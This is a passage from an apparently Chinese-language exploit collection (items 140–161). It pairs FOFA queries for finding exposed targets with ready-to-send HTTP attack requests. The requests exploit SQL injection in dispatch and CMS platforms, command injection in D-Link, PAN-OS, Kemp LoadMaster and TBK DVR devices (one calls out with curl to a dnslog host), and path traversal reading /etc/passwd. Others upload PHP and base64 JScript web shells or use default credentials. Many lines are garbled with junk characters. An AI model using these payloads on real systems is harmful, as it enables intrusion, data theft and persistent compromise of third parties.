FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
# D. R/ T$ o0 f: {! u L6 }" cGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
1 o$ r4 }4 u& O$ T' q# BHost: x.x.x.x. b7 W! X! o( e- g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& F0 ]: n+ O. |1 h* ]$ v# j( |4 G$ C# KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 f9 e# s) T# {" Q5 ]; XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 L1 l- f- f' _5 @5 ]/ T! IAccept-Encoding: gzip, deflate, br: S+ F( _: a9 r8 U8 _; E
Connection: close- h% Z0 D T! t
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
- o# e' O' |5 R# g4 y9 \Upgrade-Insecure-Requests: 14 p" o- m- \7 c, w" m. V
/ t( Y6 C% q* o$ j0 V) _. \
' y& `6 V1 i: @/ x140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
: h4 z/ l, Q# j4 ^9 `CVE-2024-25668 `8 _2 T1 y" r$ t
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& h: H/ P: g. p0 d3 ~
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
$ W+ V- _8 Z6 I0 w9 L; jHost: x.x.x.x
9 c( H8 v @2 q+ R' aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- o: I$ {/ w, T* m* b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' p' n7 v3 s- Z( {% o% d& q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* x" C. w+ m: X7 }
Accept-Encoding: gzip, deflate, br
# X- a" ]4 n2 k$ t9 Z) ?( `1 ^8 mConnection: close, h7 T1 J6 r8 a
Cookie: authcode=h8g9$ w/ n* T- h- d' U
Upgrade-Insecure-Requests: 1
5 u4 o4 V) Q. l6 s- A) o+ t
7 ]) w7 f) r2 l( H4 z! d( b) {: L( z2 S1 Q" p* W
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
3 l( |: N! K' Z2 nFOFA:body="指挥调度管理平台"
- v, z& V9 X3 P5 n/ ?5 b: Y# T$ d8 W. EPOST /app/ext/ajax_users.php HTTP/1.1
" i0 F$ b$ j& G; SHost: your-ip
7 F/ k- a* Z% _9 W, H6 GUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
) ^2 r7 ?0 T3 iContent-Type: application/x-www-form-urlencoded
2 m5 y: }' I3 s# O# U4 W' U: S+ ~ P5 X- H3 X
8 g# Z. Y% V+ P9 F; h
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
* Z' b" ?0 l w0 U7 w, i7 z# r5 {4 _: l
6 s; K9 m Q$ A$ K9 k142. CMSV6车辆监控平台系统中存在弱密码+ ~5 E5 T0 @) ?
CVE-2024-29666 M5 E/ c9 ?0 Q9 I
FOFA:body="/808gps/"
& U/ A9 k3 i- u- a0 n/ Jadmin/admin
4 O( f/ q0 i L; G% ?' V143. Netis WF2780 v2.1.40144 远程命令执行
F9 @2 @7 Q/ H! }% l7 H, [CVE-2024-25850+ U" T- A `8 P+ P! u
FOFA:title='AP setup' && header='netis'2 x7 R/ Y% G+ |# }
PAYLOAD
# r% \8 H; f( H$ ~$ g1 ]) d) j' }* }- o$ o: B) \) e w: }( K
144. D-Link nas_sharing.cgi 命令注入
$ Q( [4 z$ l# F; i6 g8 |( V- [FOFA:app="D_Link-DNS-ShareCenter"
4 ~) L1 U. \' @0 dsystem参数用于传要执行的命令0 K0 n! Q3 P. X6 T Q8 }
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
6 _4 `; _" n8 tHost: x.x.x.x
K" k1 W# C ^2 l: xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
' x* Z) c0 e8 A9 OConnection: close% A8 g* P, j; o3 X+ I
Accept: */*( j( [% L- E7 R
Accept-Language: en: E: F+ F& r! \5 Q1 C- S4 C
Accept-Encoding: gzip
+ S" _0 d1 o/ W4 d% L q7 b
4 h( Q0 ]* x' _) Q+ F0 i0 R9 T4 w- n. t$ ?# [; U: i
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
, e' J$ Z6 d- OCVE-2024-3400" k9 y4 D H7 ]9 X3 A; y" c. G, b
FOFA:icon_hash="-631559155"
& g# ?& a2 V! [0 N+ N- ~GET /global-protect/login.esp HTTP/1.1
: H7 x2 p' U6 _/ H1 UHost: 192.168.30.112:1005: j& \9 e$ C. t, w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
. g; w% x9 x' T$ O0 w# mConnection: close
) s/ Y( O h% C: }( qCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;' L, N$ w+ ]! R- l) X
Accept-Encoding: gzip
" ]( Z$ P% h1 E' \, F8 j: A3 Z2 H2 \1 r5 d: B
3 C" @; @" `7 e B4 k: ]* O* e
146. MajorDoMo thumb.php 未授权远程代码执行
3 ~+ w: x& `' M5 JCNVD-2024-02175" X( j6 j* L# m/ U- {# ^0 s; j" j
FOFA:app="MajordomoSL") d% H7 F/ R" n+ G; K
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1! H. B0 j4 p: u$ z: T2 S+ h
Host: x.x.x.x# t$ }' {4 ^: l" X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84, F$ i( f* s, z2 S- H
Accept-Charset: utf-8
8 M) i, ~* y" @5 Z4 zAccept-Encoding: gzip, deflate2 n* p, u- |+ m9 R
Connection: close& ~, j. ^* k5 h4 ?# T
, ?5 Y" w- ~' G
4 n; ]8 z9 @0 u
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
. M) {8 `- i0 ~' H/ {3 s( }. vCVE-2024-32399- f6 J9 E( Z7 u( S
FOFA:body="RaidenMAILD"
' j% p3 _% I* o# u$ H5 q& VGET /webeditor/../../../windows/win.ini HTTP/1.19 O8 j. V3 ?1 o6 x
Host: 127.0.0.1:813 `; F6 Y* L9 B: {4 Q$ d
Cache-Control: max-age=0
# C, M/ r' n* {7 V4 r- gConnection: close/ |8 F9 t& ~& R* H
4 Z( b+ |5 @( }7 R1 H1 v+ }2 {' @9 g# e. X
148. CrushFTP 认证绕过模板注入1 Y1 Z& j$ t& ?0 B! B
CVE-2024-4040) V2 x7 o' e3 h3 i, ~
FOFA:body="CrushFTP"' J' @" W5 b7 E2 A J) f% j
PAYLOAD
6 d& y b9 m; D0 a! [. H3 r
! W2 t; i* L& F$ S/ t; Y' w149. AJ-Report开源数据大屏存在远程命令执行
3 A4 i9 z- W: x' I# r8 ` eFOFA:title="AJ-Report"+ U! S" C8 u5 Z0 X
/ D5 ?' Q# ~; B: w. |' q# `/ T
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1/ ~5 O) @* ~, v4 W) p2 x
Host: x.x.x.x1 [$ l) J/ t" u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% \5 t% [; L0 r- {, i+ B9 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* @3 M6 k0 B7 ?1 w7 d
Accept-Encoding: gzip, deflate, br. h" }6 ]9 g5 O. M u
Accept-Language: zh-CN,zh;q=0.9& A5 `/ i0 \9 ^/ {4 X6 U0 `+ U0 }
Content-Type: application/json;charset=UTF-8' y6 W' x7 j( T: D. z
Connection: close2 J8 I7 z' y# t- J" f" l
/ l: e2 S' N* p9 a& \
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* n1 ~& d. n' r5 b5 u q: q% E; k. `
150. AJ-Report 1.4.0 认证绕过与远程代码执行, N1 X& H& V+ Q2 L6 F; W: H* M; q2 Z
FOFA:title="AJ-Report": `) c) ^: h V) d
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1) ^ k; N9 r8 r1 L' A
Host: x.x.x.x
1 T8 B1 `( z, U+ E$ ]; b) t& F1 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 e4 B3 `4 i, a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, O% H) E! p$ f
Accept-Encoding: gzip, deflate, br1 r, o( |; R D5 ] R
Accept-Language: zh-CN,zh;q=0.9
+ e" ~4 u* p0 s* J6 z/ U7 SContent-Type: application/json;charset=UTF-8
4 ]/ p4 H! U; x" z# dConnection: close
+ k. |! a# h' ]6 s/ pContent-Length: 339
4 M/ F [$ \% z3 p9 {
. N+ a" b. O, h! b{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}0 b/ ]5 d( d* I. S2 C+ z* c, D
1 I: b7 Y8 N5 B; K$ s
5 m* k. E& i& a" B6 z
151. AJ-Report 1.4.1 pageList sql注入. z7 j. j7 p- F/ R5 P5 o, A
FOFA:title="AJ-Report"( }$ I5 r2 X5 J, Q6 g. I4 `( x
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.14 X( x" K3 Z( |
Host: x.x.x.x
3 N0 u) ^8 A2 n- a# `; h0 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. a* v6 C7 E/ K( x+ UConnection: close5 M& H0 \( G- G/ c6 e7 N
Accept-Encoding: gzip y9 t/ b8 N+ k. W* h2 M- V
+ m; Q+ o' J8 D! O
+ C. h ^8 h5 w+ u8 S. f152. Progress Kemp LoadMaster 远程命令执行
. C7 K. v6 c: p! v6 a/ \! f: y; XCVE-2024-1212* d% U* f# U) g$ K
LoadMaster <= 7.2.59.2 (GA)! a' w( p) p3 Z+ o6 j. E
LoadMaster<=7.2.54.8 (LTSF)9 g3 B) w* p Y8 ^
LoadMaster <= 7.2.48.10 (LTS)
* V+ @6 X: T! v, O% D& S* _2 D' U2 MFOFA:body="LoadMaster"
6 i' F2 R- L/ m4 G$ J$ UJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
, X) g6 v% S* ?GET /access/set?param=enableapi&value=1 HTTP/1.14 O& Y: e+ N9 v2 Q8 v
Host: x.x.x.x/ c4 w2 T- y W$ I+ d" B$ P' D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.16 O2 J% f; ^9 u! @! V% X
Connection: close& J/ D) E5 g7 G5 @3 I n8 i
Accept: */*# |, f& N* P8 M: s3 r% w. d& Y
Accept-Language: en
" p/ {1 D8 ^& Q- CAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=0 t1 W0 ~/ g5 N: {* N6 X0 l& A
Accept-Encoding: gzip
3 h! Z: c+ ]$ K% p+ T( v4 O# q) i: R. w. K, N: j* |
3 B$ Q7 J8 @: |! h% V5 W5 e+ j153. gradio任意文件读取
7 z/ a) Z+ A. x3 f' cCVE-2024-1561FOFA:body="__gradio_mode__"$ r* R6 L# ~5 j0 \& M9 A( G: Q
第一步,请求/config文件获取componets的id' G# p$ O6 z) e/ w6 r0 Z
http://x.x.x.x/config
; {1 t% A) ]% D! P2 l7 G4 |- `! h" V! i7 C! y, B
7 o2 g( @0 H( E7 E
第二步,将/etc/passwd的内容写入到一个临时文件: f/ N# z! _3 Q' y: Y/ Y
POST /component_server HTTP/1.1
/ K/ {$ o; f, e# pHost: x.x.x.x
R5 j% Z% u3 H, z8 Y" ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
) h/ N, @* @- N# [9 G' MConnection: close
. `% J: K" V; N7 X+ q' CContent-Length: 115
9 u! I$ A7 D1 M6 d8 DContent-Type: application/json1 H8 c# X2 k* E( j9 B
Accept-Encoding: gzip
$ \3 @( K/ \- N* S7 D' e; m* w0 r( F/ ?
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}" U7 ~+ g2 `/ v* N# P
' k: }3 V. h+ m# p+ [% h6 F5 o3 N5 I# X1 w0 \- ^* T
第三步访问& l1 F N# }" O; x& m+ f
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
, u% r( Q7 z: o; |6 d% L& O
* h( V2 E2 S* e. M9 K: q$ T' Q% {, k/ b
154. 天维尔消防救援作战调度平台 SQL注入 F2 W, o- \' ~$ Q
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
4 X6 q$ h( c* D8 B8 rPOST /twms-service-mfs/mfsNotice/page HTTP/1.1( ~0 E4 W. K2 G3 v
Host: x.x.x.x
0 E* J6 X0 b1 H' U: JContent-Length: 106
% T: D: Z: ?9 Y: b8 |# C" r' W8 LCache-Control: max-age=0
3 o! a7 U1 c# f+ D7 u2 z7 `" z' _Upgrade-Insecure-Requests: 16 c2 u U6 I# K
Origin: http://x.x.x.x4 z7 V2 H4 z% ?$ J
Content-Type: application/json. ]! O$ Z9 W- k) ]% n$ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36% ]$ f, G: j& J2 b5 i. v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' ~, a9 P r" w$ C6 D2 `
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page3 I# x I/ C9 }% q: U6 \, d
Accept-Encoding: gzip, deflate
$ R6 U* X" [' f9 g4 {) \0 bAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
6 |2 F, w/ ~8 wConnection: close7 l& |) n; ]3 A. Y, j
3 {; c6 o" p- E' H# _
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}" \% ^; G! R4 |% e
! u7 U+ S( o O( ?+ }9 m% V/ V. C! t7 j+ ^1 u1 H0 x W5 I
155. 六零导航页 file.php 任意文件上传5 ~- j6 o7 [. J$ |3 \3 R4 N
CVE-2024-34982
& m5 Z' _/ ?6 KFOFA:title=="上网导航 - LyLme Spage"2 _" m8 R! C2 P6 \% q
POST /include/file.php HTTP/1.1
! W6 I' z* r' K& y T; K# CHost: x.x.x.x
4 v2 m$ C* M: P, lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 u; D- y7 Z" l1 @Connection: close- J+ g/ Q! V1 B
Content-Length: 232" Y ]6 h0 h' k, D9 `/ R
Accept: application/json, text/javascript, */*; q=0.01: m8 W1 u; U8 h
Accept-Encoding: gzip, deflate, br
) @2 K) `. ]0 P9 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! ^" Z* R2 x, Z& A3 o4 h4 z! X! iContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
) I. D, }8 e v. qX-Requested-With: XMLHttpRequest" U( ?* ]. ^5 k% Q5 q0 V
+ J* }. O3 b4 ~/ Q-----------------------------qttl7vemrsold314zg0f
5 e# l! p: v) {+ C |7 h1 d7 \8 G- QContent-Disposition: form-data; name="file"; filename="test.php"% Q( ~, Z% R+ L/ ~! v8 _
Content-Type: image/png
Z5 ~: n( [1 y9 d4 P6 V; f
7 d/ D! g4 }8 x& J4 S" d8 f<?php phpinfo();unlink(__FILE__);?>
" _, ?" x0 @. @7 t6 q1 x-----------------------------qttl7vemrsold314zg0f--
% i8 H" n Q+ {* R& Z W1 T3 _- W9 A( d0 [
; F6 P0 K; F2 ]+ i: r. `
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
. K0 u$ `% ?" g( i b* R' r( t
0 h8 ?# [8 ^* ]156. TBK DVR-4104/DVR-4216 操作系统命令注入8 h% i' y9 l9 G- \% f, d( m/ e, K
CVE-2024-37217 \5 f- J* b# q* i9 o* H
FOFA:"Location: /login.rsp"
/ V3 H( J5 d$ X3 R% V! Y T·TBK DVR-41041 G( [% r4 H* V$ f) o" X/ T
·TBK DVR-4216
, @/ J2 G$ m5 v+ jcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
$ _4 ^ j4 k, a( K8 d/ Z9 A0 i$ Z' C: |! y
5 ?- ^! Z( L/ X
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
* L0 p8 z( j# T( z1 NHost: x.x.x.x4 I6 N8 ~/ M2 v
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 M6 \3 A# B* l) D- Q" c- U
Connection: close
( Q; }" }7 p8 N/ K1 wContent-Length: 0
1 B8 D* T# `! f9 LCookie: uid=1
6 }% E9 Q9 M: O- e8 e" `Accept-Encoding: gzip. I% M. M& c% W( U$ M" N7 d
1 ~ d5 q% [$ z) Z6 C
~, x; Z# I; X/ _5 [' K157. 美特CRM upload.jsp 任意文件上传+ N. Z5 Z8 n9 b/ R( Y4 C' x
CNVD-2023-06971
0 s T+ |& \$ c1 t; ?4 _* v5 g: aFOFA:body="/common/scripts/basic.js"7 e: b" @+ ~6 s0 d
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
* S* c) e5 x$ R2 S& p xHost: x.x.x.x
' [! n2 w* D1 T' {3 \2 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
) Z8 M: n4 f! h+ U# w, Q* n9 NContent-Length: 709
. Z2 J {; U- u+ J& |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! S4 ^: c# R& {/ h. b$ M% Q1 [Accept-Encoding: gzip, deflate
# x8 I8 g9 u9 X" j2 i* o3 I& ?$ XAccept-Language: zh-CN,zh;q=0.9
# Z E) I& v. m! d$ f+ f9 ECache-Control: max-age=0/ {. j$ g/ T4 ]
Connection: close' s+ e+ x6 d S) b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN: v3 u. f1 f0 I
Upgrade-Insecure-Requests: 1
4 s" |( B6 c5 E$ w: [6 z# u1 w3 @ W) N) C. U4 @
------WebKitFormBoundary1imovELzPsfzp5dN& Y9 h* n( [- C/ p1 G9 \
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
8 D! |$ r* @, g5 LContent-Type: application/octet-stream
- t2 y0 n7 @ k% C# Y
: {0 i3 Y; r% l$ W" R, A5 H+ Hnyhelxrutzwhrsvsrafb
7 C9 F u6 e% G3 Z5 l------WebKitFormBoundary1imovELzPsfzp5dN3 v0 [6 z5 w* N& m1 D! O# `0 _, i
Content-Disposition: form-data; name="key"
) X# l5 W7 l) P5 R# h" o# v8 t0 |9 r) x1 E7 v: O
null% I# g' Z4 P2 f- d9 t2 Y6 K+ Y
------WebKitFormBoundary1imovELzPsfzp5dN1 c! P6 n* K: r1 y2 C6 g+ ?1 J" Y
Content-Disposition: form-data; name="form"# N( [8 t: I& E0 m
+ H# k% }7 g. j' Q9 M% v
null* t v) L: [ e- m2 M9 O9 e
------WebKitFormBoundary1imovELzPsfzp5dN
$ k, p& V6 c# U$ MContent-Disposition: form-data; name="field"7 u* Q$ n3 ]& _ {- M% p3 j3 m5 \! p
; l9 \) \* l6 a% onull6 {5 A' k- q: E7 D
------WebKitFormBoundary1imovELzPsfzp5dN- C* U1 t3 W9 J9 R" y2 c7 t
Content-Disposition: form-data; name="filetitile"
7 }, \4 E ]0 m. d
8 F$ {# Y( h$ Q: Anull0 J# r% u% W1 U2 k. ?6 E
------WebKitFormBoundary1imovELzPsfzp5dN' z+ i) \3 L% c9 H
Content-Disposition: form-data; name="filefolder"! G1 o' `9 `: v4 ^7 H2 J1 |1 M1 \
P3 Z2 f9 a- Q/ O4 nnull
# f# o) ]3 C/ P p------WebKitFormBoundary1imovELzPsfzp5dN--
+ b/ A! y# i8 u. v3 j9 a- r8 l' g. a: c
# h' X8 U" e0 i. D0 j/ v$ a
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp% ^* Q- K* O* E5 e; m @9 M$ A4 S! m
" X7 f" Y, {3 I% C7 y
158. Mura-CMS-processAsyncObject存在SQL注入
g. X v7 y8 A: a7 @CVE-2024-32640+ ~+ j- N+ U" k" {3 ~) q( k
FOFA:"Generator: Masa CMS"+ l# z6 }& D% M0 E
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& A+ K/ Q/ l/ _4 t; F( D4 t: Z, ~( hHost: {{Hostname}}( f3 J) ^4 q( L) e
Content-Type: application/x-www-form-urlencoded/ K; i- F+ D4 V* }0 l& a
" Z; ]2 {% J3 K x( r- \object=displayregion&contenthistid=x\'&previewid=18 l' O+ W2 x: P3 ^6 m$ u% o0 v
& O/ g6 t& ]8 v9 h! G H2 ]" L
* P4 N1 G" l `
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
: S" A" C+ ~8 c5 xFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")9 F( [9 e0 H$ H9 L$ p* i6 J; M" Q
POST /webservices/WebJobUpload.asmx HTTP/1.1
4 }& _+ Q4 s1 jHost: x.x.x.x/ E5 S2 ]" s8 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
5 H7 K) a% A) h B& R; P2 c+ qContent-Length: 1080
! |7 a0 [6 C& u3 h+ f) hAccept-Encoding: gzip, deflate4 @! E. F6 P. `$ x
Connection: close; ]' V" E) d" k( K4 g
Content-Type: text/xml; charset=utf-8* h" c* E; F' `
Soapaction: "http://rainier/jobUpload"
: u5 Q4 J5 F) R6 L* d4 g7 p5 ^5 x: F
<?xml version="1.0" encoding="utf-8"?>
V- }& m& ] |: s7 [6 j<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- Z9 z, ?) y3 F! v7 _/ f
<soap:Body>
3 ?* c5 }8 u( L( g& A6 K4 ]<jobUpload xmlns="http://rainier">( P7 b6 P) w- m" j. E- @* A
<vcode>1</vcode>
- e: A$ z* Z# F) H* f% `3 P! h<subFolder></subFolder>3 f3 R: `4 o4 P
<fileName>abcrce.asmx</fileName>5 U8 W% w. S s' A* b: u
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>; C6 ^+ X8 q2 a) @2 q
</jobUpload>
$ }% D/ j( z7 L5 h2 @ R</soap:Body>8 M" |0 ?# T3 }3 p @( R6 u8 e
</soap:Envelope>* }5 B. q# e% D# n. d0 c( G) r
. M0 o. T6 R* r# p
5 C* g$ t" \, k P& E7 |/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")+ a6 F5 s4 G; y' X
2 B& [1 m! t! ?! W& U8 s
$ A( X. v/ ~$ i3 `160. Sonatype Nexus Repository 3目录遍历与文件读取0 w& v E; D8 C8 t2 ^( ~4 b
CVE-2024-4956, z9 B7 K6 b# s3 p3 P1 H" n, I! l+ c
FOFA:title="Nexus Repository Manager"
0 }# D0 G1 l8 f7 b# u2 HGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
2 k8 U+ y' ?' [& }3 a0 X" J/ THost: x.x.x.x3 I: z' c. `& ^4 d# {( }$ o& I
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
1 T) C6 Y1 m, z- W/ r! f) UConnection: close6 F- U6 h' e) b7 i
Accept: */*
5 F# y0 t+ @2 }* U( LAccept-Language: en
6 j6 v M0 g% c4 z! F2 u0 nAccept-Encoding: gzip
4 j: O" l& F8 @
5 m1 r( T: H1 f7 _% t% o7 X: k, m& t+ Q/ e1 y+ B
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
0 H& S, V5 \; F/ e& W) \0 B E/ fFOFA:body="/KT_Css/qd_defaul.css"
# C: l5 j' ^( t0 n" i# W+ b8 Z6 m" D第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密" _7 e I' |0 w6 v3 U. N( T; c1 r' I
POST /Webservice.asmx HTTP/1.1
4 s9 [8 k' e7 i; ^# pHost: x.x.x.x
# x2 h1 V) G% U) G6 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36& a" @4 S+ K: x/ H) O. [* p
Connection: close) ^3 @# P4 K# h) D
Content-Length: 445- `/ z7 ~8 J* H) W. a
Content-Type: text/xml
8 } K4 e2 r2 A) c/ }4 PAccept-Encoding: gzip
( J: I; j" l6 g% R; T) {
) G& C" S, @0 s1 \/ W$ N. ^& O; k. o<?xml version="1.0" encoding="utf-8"?>+ U+ r8 V# c4 P' m8 E" b. J
<soap:Envelope xmlns:xsi="3 O0 k, c2 M6 b+ d% D- C2 s$ f/ z
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
8 d7 C) F1 [$ i$ L% Rxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 Q9 x* u$ K( b9 c
<soap:Body>
( q# B2 B# ?. q4 T; k) N$ t$ ?' t<UploadResume xmlns="http://tempuri.org/">5 r8 L2 v* C- @3 l* C
<ip>1</ip>
